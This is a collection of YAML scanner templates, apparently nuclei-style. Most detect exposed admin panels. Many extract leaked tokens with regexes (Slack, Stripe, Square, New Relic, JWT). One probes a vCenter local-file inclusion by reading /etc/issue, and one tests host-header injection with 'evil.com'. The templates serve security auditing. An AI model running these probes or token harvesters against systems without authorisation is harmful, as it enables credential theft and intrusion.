--------------------------------------------------------------------------------
1 | id: call-break-cms
2 |
3 | info:
4 | name: Call Break CMS
5 | author: dhiyaneshDk
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}'
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - 'Call Break CMS'
18 | condition: and
19 |
--------------------------------------------------------------------------------
/certificate-validation.yaml:
--------------------------------------------------------------------------------
1 | id: improper-certificate-validation
2 |
3 | info:
4 | name: Improper Certificate Validation
5 | author: gaurang
6 | severity: medium
7 | tags: android,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | matchers:
14 | - type: word
15 | words:
16 | - "Landroid/webkit/SslErrorHandler;->proceed()V"
--------------------------------------------------------------------------------
/cockpit-detect.yaml:
--------------------------------------------------------------------------------
1 | id: cockpit-detect
2 |
3 | info:
4 | name: Detect Agentejo Cockpit
5 | author: dwisiswant0
6 | severity: info
7 | tags: tech,cockpit
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/auth/login"
13 | matchers:
14 | - type: word
15 | words:
16 | - "Authenticate Please!"
17 |
--------------------------------------------------------------------------------
/compal.yaml:
--------------------------------------------------------------------------------
1 | id: compal-panel-detect
2 |
3 | info:
4 | name: Compal CH7465LG panel detect
5 | author: fabaff
6 | severity: info
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/common_page/login.html"
12 | matchers:
13 | - type: word
14 | words:
15 | - ""
16 | part: body
17 |
--------------------------------------------------------------------------------
/couchdb-fauxton.yaml:
--------------------------------------------------------------------------------
1 | id: couchdb-fauxton
2 |
3 | info:
4 | name: Apache CouchDB Fauxton Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel,apache,couchdb
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}'
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - 'Project Fauxton'
18 |
--------------------------------------------------------------------------------
/cx-cloud-login.yaml:
--------------------------------------------------------------------------------
1 | id: cx-cloud-login
2 |
3 | info:
4 | name: CX Cloud
5 | author: dhiyaneshDk
6 | severity: info
7 | tags: panel,cx
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}'
13 | - '{{BaseURL}}/cxcum/'
14 |
15 | matchers:
16 | - type: word
17 | words:
18 | - "CX Cloud"
19 |
--------------------------------------------------------------------------------
/deadbolt-ransomware.yaml:
--------------------------------------------------------------------------------
1 | id: deadbolt-ransomware
2 |
3 | info:
4 | name: Deadbolt Ransomware Detection
5 | author: pdteam
6 | severity: info
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}"
12 |
13 | matchers:
14 | - type: word
15 | words:
16 | - "ALL YOUR FILES HAVE BEEN LOCKED BY DEADBOLT."
--------------------------------------------------------------------------------
/flink-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: flink-exposure
2 |
3 | info:
4 | name: Apache Flink Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel,apache,flink
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}'
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - 'Apache Flink Web Dashboard'
18 |
--------------------------------------------------------------------------------
/rabbitmq-dashboard.yaml:
--------------------------------------------------------------------------------
1 | id: rabbitmq-dashboard
2 |
3 | info:
4 | name: RabbitMQ Dashboard
5 | author: fyoorer
6 | severity: info
7 | tags: panel,rabbitmq
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}'
13 | matchers:
14 | - type: word
15 | words:
16 | - "RabbitMQ Management"
17 | part: body
18 |
--------------------------------------------------------------------------------
/redash-detection.yaml:
--------------------------------------------------------------------------------
1 | id: redash-panel
2 |
3 | info:
4 | name: Redash Panel
5 | author: Adam Crosser
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/'
13 | redirects: true
14 |
15 | matchers:
16 | - type: word
17 | words:
18 | - 'Login to Redash'
19 |
--------------------------------------------------------------------------------
/bitly-secret-key.yaml:
--------------------------------------------------------------------------------
1 | id: bitly-secret-key
2 |
3 | info:
4 | name: Bitly Secret Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,bitly
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | extractors:
15 | - type: regex
16 | part: body
17 | regex:
18 | - 'R_[0-9a-f]{32}'
--------------------------------------------------------------------------------
/kafka-connect-ui.yaml:
--------------------------------------------------------------------------------
1 | id: kafka-connect-ui
2 |
3 | info:
4 | name: Apache Kafka Connect UI Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel,kafka,apache
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}'
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - 'Kafka Connect UI'
18 |
--------------------------------------------------------------------------------
/slack-bot-token.yaml:
--------------------------------------------------------------------------------
1 | id: slack-bot-token
2 |
3 | info:
4 | name: Slack access token
5 | author: nadino
6 | severity: info
7 | tags: exposure,token,slack
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | extractors:
15 | - type: regex
16 | part: body
17 | regex:
18 | - "xoxb-[0-9A-Za-z\\-]{51}"
--------------------------------------------------------------------------------
/api/newrelic-rest-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: newrelic-rest-api-key
2 |
3 | info:
4 | name: REST API Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | extractors:
14 | - type: regex
15 | part: body
16 | regex:
17 | - '(?i)NRRA-[a-f0-9]{42}'
--------------------------------------------------------------------------------
/hadoop-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: hadoop-exposure
2 |
3 | info:
4 | name: Apache Hadoop Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel,apache,hadoop
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/dfshealth.html'
13 | matchers:
14 | - type: word
15 | words:
16 | - 'Hadoop
'
17 |
--------------------------------------------------------------------------------
/paypal-braintree-token.yaml:
--------------------------------------------------------------------------------
1 | id: paypal-braintree-token
2 |
3 | info:
4 | name: Paypal Braintree Access Token
5 | author: gaurang
6 | severity: high
7 | tags: token,file,paypal
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}"
17 |
--------------------------------------------------------------------------------
/webview-javascript.yaml:
--------------------------------------------------------------------------------
1 | id: webview-javascript-enabled
2 |
3 | info:
4 | name: Webview JavaScript enabled
5 | author: gaurang
6 | severity: info
7 | tags: android,file,javascript
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | matchers:
14 | - type: word
15 | words:
16 | - "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V"
17 |
--------------------------------------------------------------------------------
/wordpress/wp-xmlrpc.yaml:
--------------------------------------------------------------------------------
1 | id: wordpress-xmlrpc-file
2 |
3 | info:
4 | name: WordPress xmlrpc
5 | author: udit_thakkur
6 | severity: info
7 | tags: wordpress
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/xmlrpc.php"
13 | matchers:
14 | - type: word
15 | words:
16 | - 'XML-RPC server accepts POST requests only.'
17 |
--------------------------------------------------------------------------------
/api/newrelic-admin-api-key.yaml:
--------------------------------------------------------------------------------
1 | id: newrelic-admin-api-key
2 |
3 | info:
4 | name: Admin API Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | extractors:
14 | - type: regex
15 | part: body
16 | regex:
17 | - '(?i)NRAA-[a-f0-9]{27}'
--------------------------------------------------------------------------------
/git/gitlab-ci.yaml:
--------------------------------------------------------------------------------
1 | id: database-username-and-password
2 |
3 | info:
4 | name: database-username-and-password
5 | author: me
6 | severity: high
7 | tags: github
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/.gitlab-ci.yml"
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - "variables:"
18 | condition: and
--------------------------------------------------------------------------------
/kubernetes/kubernetes-dashboard.yaml:
--------------------------------------------------------------------------------
1 | id: kubernetes-dashboard
2 |
3 | info:
4 | name: Kubernetes Console Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel,kubernetes,devops
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | matchers:
14 | - type: word
15 | words:
16 | - "Kubernetes Dashboard"
17 |
--------------------------------------------------------------------------------
/mantis-detect.yaml:
--------------------------------------------------------------------------------
1 | id: mantis-detect
2 |
3 | info:
4 | name: Mantis portal detection
5 | author: makyotox
6 | severity: info
7 | tags: panel,mantis
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/login_page.php"
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - "MantisBT"
18 | part: body
19 |
--------------------------------------------------------------------------------
/slack-user-token.yaml:
--------------------------------------------------------------------------------
1 | id: slack-user-token
2 |
3 | info:
4 | name: Slack User token disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,slack
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | extractors:
15 | - type: regex
16 | part: body
17 | regex:
18 | - "xoxp-[0-9A-Za-z\\-]{72}"
--------------------------------------------------------------------------------
/slack-webhook.yaml:
--------------------------------------------------------------------------------
1 | id: slack-webhook
2 |
3 | info:
4 | name: Slack Webhook
5 | author: gaurang
6 | severity: high
7 | tags: token,file,slack
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}"
17 |
--------------------------------------------------------------------------------
/x-hacker.yaml:
--------------------------------------------------------------------------------
1 | id: x-hacker
2 |
3 | info:
4 | name: Displays the X-Hacker server header if defined
5 | author: geeknik
6 | severity: info
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}"
12 |
13 | extractors:
14 | - type: regex
15 | part: header
16 | name: x-hacker
17 | regex:
18 | - '(?i)X-Hacker:.*'
19 |
--------------------------------------------------------------------------------
/a-fingerprinting/nacos-detect.yaml:
--------------------------------------------------------------------------------
1 | id: nacos-detect
2 |
3 | info:
4 | name: Nacos Detect
5 | author: zan8in
6 | severity: info
7 | verified: true
8 |
9 | rules:
10 | r0:
11 | request:
12 | method: GET
13 | path: /nacos/
14 | follow_redirects: true
15 | expression: response.status == 200 && response.body.bcontains(b'Nacos')
16 | expression: r0()
--------------------------------------------------------------------------------
/aims-password-mgmt-client.yaml:
--------------------------------------------------------------------------------
1 | id: aims-password-mgmt-client
2 |
3 | info:
4 | name: Aims Password Management Client Detect
5 | author: iamthefrogy
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/aims/ps/"
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - "Avatier Corporation"
18 |
--------------------------------------------------------------------------------
/biometric-detect.yaml:
--------------------------------------------------------------------------------
1 | id: biometric-detect
2 |
3 | info:
4 | name: Biometric or Fingerprint detect
5 | author: gaurang
6 | severity: info
7 | tags: android,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | matchers:
14 | - type: word
15 | words:
16 | - "android.permission.USE_FINGERPRINT"
17 | - "android.permission.USE_BIOMETRIC"
--------------------------------------------------------------------------------
/kafka-topics-ui.yaml:
--------------------------------------------------------------------------------
1 | id: kafka-topics-ui
2 |
3 | info:
4 | name: Apache Kafka Topics UI Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel,kafka,apache
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}'
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - 'Kafka Topics UI - Browse Kafka Data'
18 |
--------------------------------------------------------------------------------
/kronos-workforce-central.yaml:
--------------------------------------------------------------------------------
1 | id: kronos-workforce-central
2 |
3 | info:
4 | name: Kronos Workforce Central Panel
5 | author: emadshanab
6 | severity: info
7 | tags: panel,kronos
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/wfc/portal'
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - 'Kronos Workforce Central'
18 |
--------------------------------------------------------------------------------
/maian-cart-detect.yaml:
--------------------------------------------------------------------------------
1 | id: maian-cart-detect
2 |
3 | info:
4 | name: Maian Cart Detection
5 | author: pdteam
6 | severity: info
7 | tags: tech,maian
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/favicon.ico"
13 |
14 | matchers:
15 | - type: dsl
16 | dsl:
17 | - "status_code==200 && (\"-498581627\" == mmh3(base64_py(body)))"
--------------------------------------------------------------------------------
/newrelic-insights-key.yaml:
--------------------------------------------------------------------------------
1 | id: newrelic-insights-key
2 |
3 | info:
4 | name: Insights Keys Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | extractors:
14 | - type: regex
15 | part: body
16 | regex:
17 | - '(?i)NRI(?:I|Q)-[A-Za-z0-9\-_]{32}'
--------------------------------------------------------------------------------
/rocketmq-console-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: rocketmq-console-exposure
2 |
3 | info:
4 | name: Apache RocketMQ Console Exposure
5 | author: pdteam
6 | severity: info
7 | tags: panel,apache
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}'
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - "RocketMq-console-ng"
18 |
--------------------------------------------------------------------------------
/s3-detect.yaml:
--------------------------------------------------------------------------------
1 | id: s3-detect
2 |
3 | info:
4 | name: Detect Amazon-S3 Bucket
5 | author: melbadry9
6 | severity: info
7 | tags: aws,s3,bucket,tech
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/%c0"
13 | matchers:
14 | - type: regex
15 | regex:
16 | - "(?:InvalidURI|InvalidArgument|NoSuchBucket)"
17 | part: body
18 |
--------------------------------------------------------------------------------
/smtp-detection.yaml:
--------------------------------------------------------------------------------
1 | id: smtp-service-detection
2 |
3 | info:
4 | name: SMTP Service Detection
5 | author: pussycat0x
6 | severity: info
7 | tags: network,service,smtp
8 |
9 | network:
10 | - inputs:
11 | - data: "\r\n"
12 | host:
13 | - "{{Hostname}}"
14 | - "{{Host}}:25"
15 | matchers:
16 | - type: word
17 | words:
18 | - "SMTP"
19 |
--------------------------------------------------------------------------------
/square-access-token.yaml:
--------------------------------------------------------------------------------
1 | id: square-access-token
2 |
3 | info:
4 | name: Square Access Token
5 | author: gaurang,daffainfo
6 | severity: high
7 | tags: token,file,square
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "EAAAE[a-zA-Z0-9_-]{59}"
17 | - "sq0atp-[0-9A-Za-z\\-_]{22}"
18 |
--------------------------------------------------------------------------------
/supervpn-panel.yaml:
--------------------------------------------------------------------------------
1 | id: supervpn-detect
2 |
3 | info:
4 | name: SuperVPN panel detect
5 | author: organiccrap
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/admin/login.html"
13 | matchers:
14 | - type: word
15 | words:
16 | - "Sign In-SuperVPN"
17 | part: body
18 |
--------------------------------------------------------------------------------
/webview-universal-access.yaml:
--------------------------------------------------------------------------------
1 | id: webview-universal-access
2 |
3 | info:
4 | name: Webview Universal Access enabled
5 | author: gaurang
6 | severity: medium
7 | tags: android,file
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | matchers:
14 | - type: word
15 | words:
16 | - "Landroid/webkit/WebSettings;->setAllowUniversalAccessFromFileURLs(Z)V"
--------------------------------------------------------------------------------
/X-Host.yaml:
--------------------------------------------------------------------------------
1 | id: x-host
2 |
3 | info:
4 | name: x-host
5 | author: Kabilan S
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | # Example of sending some headers to the servers
11 | headers:
12 |
13 | X-Host: "evil.com"
14 | path:
15 | - "{{BaseURL}}/"
16 | matchers:
17 | - type: word
18 | words:
19 | - "evil.com"
20 |
--------------------------------------------------------------------------------
/a-fingerprinting/solarwinds-orion-panel.yaml:
--------------------------------------------------------------------------------
1 | id: solarwinds-orion
2 |
3 | info:
4 | name: SolarWinds Orion Panel
5 | author: puzzlepeaches
6 | severity: info
7 | verified: true
8 |
9 | rules:
10 | r0:
11 | request:
12 | method: GET
13 | path: /Orion/Login.aspx
14 | expression: response.status == 200 && response.body.bcontains(b'SolarWinds Orion')
15 | expression: r0()
--------------------------------------------------------------------------------
/a-fingerprinting/spring-detect.yaml:
--------------------------------------------------------------------------------
1 | id: spring-detect
2 |
3 | info:
4 | name: Spring detected
5 | author: Adam Crosser
6 | severity: info
7 | verified: true
8 |
9 | rules:
10 | r0:
11 | request:
12 | method: GET
13 | path: /error
14 | follow_redirects: true
15 | expression: response.status == 500 && response.body.bcontains(b'"status":999')
16 | expression: r0()
--------------------------------------------------------------------------------
/compal-panel.yaml:
--------------------------------------------------------------------------------
1 | id: compal-panel-detect
2 |
3 | info:
4 | name: Compal CH7465LG panel detect
5 | author: fabaff
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/common_page/login.html"
13 | matchers:
14 | - type: word
15 | words:
16 | - ""
17 | part: body
18 |
--------------------------------------------------------------------------------
/easyredir.yaml:
--------------------------------------------------------------------------------
1 | id: easyredir-takeover
2 |
3 | info:
4 | name: easyredir Takeover Detection
5 | author: harish
6 | severity: high
7 | tags: takeover
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - "This IP or CNAME is part of EasyRedir's URL redirection edge network."
18 |
--------------------------------------------------------------------------------
/firebase-database.yaml:
--------------------------------------------------------------------------------
1 | id: firebase-database
2 |
3 | info:
4 | name: Firebase Database Detect
5 | author: gaurang
6 | severity: info
7 | tags: token,file,firebase
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "[a-z0-9.-]+\\.firebaseio\\.com"
17 | - "[a-z0-9.-]+\\.firebaseapp\\.com"
18 |
--------------------------------------------------------------------------------
/solarwinds-orion.yaml:
--------------------------------------------------------------------------------
1 | id: solarwinds-orion
2 |
3 | info:
4 | name: SolarWinds Orion Panel
5 | author: puzzlepeaches
6 | severity: info
7 | tags: panel,solarwinds
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/Orion/Login.aspx"
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - "SolarWinds Orion"
18 | part: body
19 |
--------------------------------------------------------------------------------
/sonarqube-login.yaml:
--------------------------------------------------------------------------------
1 | id: sonarqube-login
2 |
3 | info:
4 | name: SonarQube panel detect
5 | author: dhiyaneshDk
6 | severity: info
7 | tags: panel,sonarqube
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/sessions/new"
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - "SonarQube"
18 | part: body
19 |
--------------------------------------------------------------------------------
/sql-server-reporting.yaml:
--------------------------------------------------------------------------------
1 | id: sql-server-reporting
2 |
3 | info:
4 | name: Detect Microsoft SQL Server Reporting
5 | author: puzzlepeaches
6 | severity: info
7 | tags: tech,microsoft
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/Reports/Pages/Folder.aspx"
13 | matchers:
14 | - type: word
15 | words:
16 | - "Report Manager"
17 |
--------------------------------------------------------------------------------
/zipkin-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: zipkin-exposure
2 |
3 | info:
4 | name: Zipkin Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel,zipkin
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | - "{{BaseURL}}/zipkin/"
14 | matchers:
15 | - type: word
16 | part: body
17 | words:
18 | - "webpackJsonpzipkin-lens"
19 |
--------------------------------------------------------------------------------
/basic-cors-flash.yaml:
--------------------------------------------------------------------------------
1 | id: basic-cors-misconfig-flash
2 |
3 | info:
4 | name: Basic CORS misconfiguration exploitable with Flash
5 | author: nadino
6 | severity: low
7 |
8 | requests:
9 | - method: GET
10 | path:
11 | - "{{BaseURL}}/crossdomain.xml"
12 | matchers:
13 | - type: word
14 | words:
15 | - 'allow-access-from domain="*"'
16 | part: body
17 |
--------------------------------------------------------------------------------
/jwt-token.yaml:
--------------------------------------------------------------------------------
1 | id: jwt-token
2 |
3 | info:
4 | name: JWT Token Disclosure
5 | author: Ice3man
6 | severity: unknown
7 | tags: exposure,token
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | extractors:
15 | - type: regex
16 | part: body
17 | regex:
18 | - 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}'
--------------------------------------------------------------------------------
/kafka-monitoring.yaml:
--------------------------------------------------------------------------------
1 | id: kafka-monitoring
2 |
3 | info:
4 | name: Apache Kafka Monitor Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel,kafka,apache
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}'
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - '>KafkaMonitor'
18 | - '>Kafka Monitor GUI'
19 |
--------------------------------------------------------------------------------
/sonicwall-sslvpn-panel.yaml:
--------------------------------------------------------------------------------
1 | id: sonicwall-sslvpn-panel
2 |
3 | info:
4 | name: SonicWall Virtual Office SSLVPN Panel
5 | author: PR3R00T
6 | severity: info
7 | tags: panel,sonicwall
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/cgi-bin/welcome"
13 | matchers:
14 | - type: word
15 | words:
16 | - "Virtual Office"
17 |
--------------------------------------------------------------------------------
/stridercd-detection.yaml:
--------------------------------------------------------------------------------
1 | id: stridercd-detection
2 |
3 | info:
4 | name: StriderCD Panel
5 | author: Adam Crosser
6 | severity: info
7 | tags: panel,cicd
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/'
13 | redirects: true
14 |
15 | matchers:
16 | - type: word
17 | words:
18 | - "Strider"
19 |
--------------------------------------------------------------------------------
/stripe-secret-key.yaml:
--------------------------------------------------------------------------------
1 | id: stripe-secret-key
2 |
3 | info:
4 | name: Stripe Secret Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,stripe
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | extractors:
14 | - type: regex
15 | part: body
16 | regex:
17 | - 'sk_(?:live|test)_[0-9a-zA-Z]{24}'
18 |
--------------------------------------------------------------------------------
/twitter-secret.yaml:
--------------------------------------------------------------------------------
1 | id: twitter-secret
2 |
3 | info:
4 | name: Twitter Secret
5 | author: gaurang,daffainfo
6 | severity: medium
7 | tags: token,file,twitter
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | regex:
16 | - "(?i)twitter(.{0,20})?[0-9a-z]{35,44}"
17 | - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}"
--------------------------------------------------------------------------------
/unauthenticated-lansweeper.yaml:
--------------------------------------------------------------------------------
1 | id: unauthenticated-lansweeper
2 |
3 | info:
4 | name: Unauthenticated Lansweeper Instance
5 | author: divya_mudgal
6 | severity: high
7 | tags: lansweeper,unauth
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/Default.aspx"
13 |
14 | matchers:
15 | - type: word
16 | words:
17 | - "Main page - Lansweeper"
--------------------------------------------------------------------------------
/vm/vmware-vcenter-lfi-linux.yaml:
--------------------------------------------------------------------------------
1 | id: vmware-vcenter-lfi-linux
2 |
3 | info:
4 | name: Vmware Vcenter LFI for Linux appliances
5 | author: PR3R00T
6 | severity: high
7 | tags: vmware,lfi,vcenter
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/eam/vib?id=/etc/issue"
13 | matchers:
14 | - type: word
15 | words:
16 | - "vCenter Server"
17 |
--------------------------------------------------------------------------------
/yopass-panel.yaml:
--------------------------------------------------------------------------------
1 | id: yopass-panel
2 |
3 | info:
4 | name: Yopass Application Exposure
5 | author: Adam Crosser
6 | severity: info
7 | metadata:
8 | shodan-query: title:"Yopass"
9 | tags: panel,yopass
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - '{{BaseURL}}'
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - "Yopass"
20 |
--------------------------------------------------------------------------------
/amazon-sns-token.yaml:
--------------------------------------------------------------------------------
1 | id: amazon-sns-token
2 |
3 | info:
4 | name: Amazon SNS Token Detect
5 | author: TheBinitGhimire
6 | severity: info
7 | tags: file,token,amazon,aws
8 |
9 | file:
10 | - extensions:
11 | - all
12 |
13 | extractors:
14 | - type: regex
15 | name: amazon-sns-topic
16 | regex:
17 | - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+'
18 |
--------------------------------------------------------------------------------
/amazon-sns-topic.yaml:
--------------------------------------------------------------------------------
1 | id: amazon-sns-topic
2 |
3 | info:
4 | name: Amazon SNS Topic Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,amazon
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 | extractors:
14 | - type: regex
15 | part: body
16 | regex:
17 | - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+'
--------------------------------------------------------------------------------
/api/strapi-admin-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: strapi-admin-exposure
2 |
3 | info:
4 | name: Strapi Admin Dasboard Exposure
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 |
10 | requests:
11 | - raw:
12 | - |
13 | GET /admin/auth/login HTTP/1.1
14 | Host: {{Hostname}}
15 | matchers:
16 | - type: word
17 | words:
18 | - "Strapi Admin"
--------------------------------------------------------------------------------
/api/wsdl-api.yaml:
--------------------------------------------------------------------------------
1 | id: wsdl-api
2 |
3 | info:
4 | name: wsdl-detect
5 | author: jarijaas
6 | severity: info
7 | description: Detects web services that have WSDL (https://www.w3.org/TR/wsdl/)
8 | tags: exposure,api
9 |
10 | requests:
11 | - method: GET
12 | path:
13 | - "{{BaseURL}}/?wsdl"
14 | matchers:
15 | - type: word
16 | words:
17 | - "wsdl:definitions"
--------------------------------------------------------------------------------
/argocd-detect.yaml:
--------------------------------------------------------------------------------
1 | id: argocd-detect
2 |
3 | info:
4 | name: Argo CD Detect
5 | author: Adam Crosser
6 | severity: info
7 | description: Detects the Argo CD website console
8 | tags: tech,argocd
9 |
10 | requests:
11 | - method: GET
12 | path:
13 | - "{{BaseURL}}"
14 |
15 | matchers:
16 | - type: word
17 | part: body
18 | words:
19 | - 'Argo CD'
--------------------------------------------------------------------------------
/bazarr-login.yaml:
--------------------------------------------------------------------------------
1 | id: bazarr-login-detect
2 |
3 | info:
4 | name: Bazarr Login Detect
5 | author: r3dg33k
6 | severity: info
7 | reference:
8 | - https://www.bazarr.media/
9 | tags: panel,bazarr,login
10 |
11 | requests:
12 | - method: GET
13 | path:
14 | - "{{BaseURL}}/login"
15 |
16 | matchers:
17 | - type: word
18 | words:
19 | - 'Bazarr'
--------------------------------------------------------------------------------
/exposed-pagespeed-global-admin.yaml:
--------------------------------------------------------------------------------
1 | id: exposed-pagespeed-global-admin
2 |
3 | info:
4 | name: Apache PageSpeed Global Admin Dashboard Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - '{{BaseURL}}/pagespeed_admin/'
13 | matchers:
14 | - type: word
15 | words:
16 | - "Pagespeed Admin"
--------------------------------------------------------------------------------
/oauth-access-key.yaml:
--------------------------------------------------------------------------------
1 | id: google-oauth-access-key
2 |
3 | info:
4 | name: Google OAuth Access Key Disclosure
5 | author: Ice3man
6 | severity: info
7 | tags: exposure,token,google
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}"
13 |
14 | extractors:
15 | - type: regex
16 | part: body
17 | regex:
18 | - 'ya29\.[0-9A-Za-z\-_]+'
19 |
--------------------------------------------------------------------------------
/parallels-html-client.yaml:
--------------------------------------------------------------------------------
1 | id: parallels-html-client
2 |
3 | info:
4 | name: Parallels HTML5 Client
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - method: GET
11 | path:
12 | - "{{BaseURL}}/RASHTML5Gateway/"
13 | matchers:
14 | - type: word
15 | words:
16 | - "Parallels HTML5 Client"
17 | part: body
18 |
--------------------------------------------------------------------------------
/urge-takeover.yaml:
--------------------------------------------------------------------------------
1 | id: surge-takeover
2 |
3 | info:
4 | name: surge takeover detection
5 | author: pdcommunity
6 | severity: high
7 | tags: takeover
8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz
9 |
10 | requests:
11 | - method: GET
12 | path:
13 | - "{{BaseURL}}"
14 |
15 | matchers:
16 | - type: word
